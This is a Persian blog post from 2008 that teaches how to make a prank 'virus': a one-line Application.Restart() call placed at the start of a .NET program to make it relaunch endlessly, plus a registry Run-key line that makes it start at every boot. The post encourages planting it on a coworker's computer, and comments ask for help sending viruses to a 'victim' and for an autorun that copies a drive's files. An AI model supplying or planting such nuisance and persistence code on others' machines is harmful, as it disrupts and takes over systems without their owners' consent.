ساخت ویروس در عرض چند ثانیه

۱۳۸۷/۰۷/۰۱ ۱۴:۱۰ Salar https://www.blogger.com/profile/08261083424775464146 منتشر شده در تاریخ : ۱۳۸۷/۰۷/۰۱ دسته بندی : ، 5

Virus

اول اینکه این ویروس نیست و تیتر رو برای جذابیت قضیه آبدار نوشتم. بعدشم از این روش فقط برای شوخی کردن با رفیق و رفقا استفاده کنید و انتشار اون تو جمع و اینترنت ممنوع؛ پس هیچ مسئولیتی در قبال استفاده نادرست از این روش بر عهده نمی گیرم!

فقط کافیه که یک خط کد زیر رو در جایی که می گم بنویسید تا برنامه به صورت پی در پی اجرا بشه و طرف مقابل کلافه بشه. در ضمن این کد فقط برای زبان های دات نتی یعنی C# و VB.NET و ... کار می کنه.

برای انجام این کار در پروژه C# خودتون فایل Program.cs و در پروژه VB.NET خودتون فایل Program.vb رو باز کنید و در ابتدای تابع Main کد زیر رو بنویسید:

Application.Restart()



این کار رو می تونید رو سیستم همکارتون انجام بدین و منتظر بمونین که برنامه رو اجرا کنه. توصیه می کنم از این لحظه فیلم تهیه کنید و به سایت youtube هم اضافه کنید. :twisted:

راز این موضوع در تایع Application.Restart نهفته است. این تابع باعث ریستارت شدن برنامه میشه. به این صورت که یک برنامه موقت و کوچک در دایرکتوری temp در سیستم ایجاد میکنه و سپس برنامه اصلی رو می بنده، بعد از بسته شدن برنامه، فایل اجرایی ایجاد شده در temp برنامه ما رو دوباره اجرا می کنه و سپس پاک میشه. در کد بالا چون ما کد رو در ابتدای برنامه نوشتیم پس برنامه در همان ابتدای اجرا ریستارت خواهد شد و این روند ادامه خواهد داشت تا زمانی که سیستم پر از این برنامه خواهد شد.

برای اینکه از شر این مزاحم خلاص بشین ساده ترین راه ریستارت سیستم هست. اما این هم راه داره و اون این که برنامه رو تو ریجستری ویندوز بنویسید و هربار که سیستم بالا میاد برنامه هم بالا بیاد. با این کد:

Microsoft.Win32.Registry.SetValue(@"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","Hello",System.Windows.Forms.Application.ExecutablePath)



این کد رو قبل از تابع Restart بنویسید و نتیجه رو مشاهده کنید. برای اینکه از شر این روش هم خلاص بشید، راه سادش رفتن در حالت Safe Mode و حذف کردن کلیدی که آدرسش در کد بالا هست.

در پایان بهتره که این کار رو تو اوقات فراغت و برای شوخی با همکاران یا دوستانتون انجام بدین. در ضمن این روش قبلا توسط من روی همکاران و توسط همکاران روی من امتحان شده و 100% جواب داده و موجب شاده و خنده بسیار شده است.

خوش باشین

 

5 بازخورد برای “ساخت ویروس در عرض چند ثانیه”

  1. سلام من يه برنامه اجرايي لازم دارم مي توني كمكم كني؟
    مي خوام تو Autoexe.bat بشه اگه كمك مي كني لطفا يه ميل بزن توضيح بشتر بدم
    ممنون

    پاسخحذف
  2. دمت گرم
    -----------------------
    خواهش می کنم. مثل اینکه خوب جواب داده...

    پاسخحذف
  3. جالب بود لطفا اگر می تونی راهی رو به من نشون بده که بتونم ویروسهام رو همراه فایلهای ارسالی به قربانیم براش بفرستم و با اجرای برنامه اصلی ویروس هم اجرا بشه

    پاسخحذف
  4. سلام

    اگه ميشه به من ايميل بفرستيد

    پاسخحذف
  5. سلام من یه autorun می خوام که هنگام اجرا شدن درایو (d)یا....را کپی و در جای معین pastکنه اگه کمکم کنی ممنون میشم

    پاسخحذف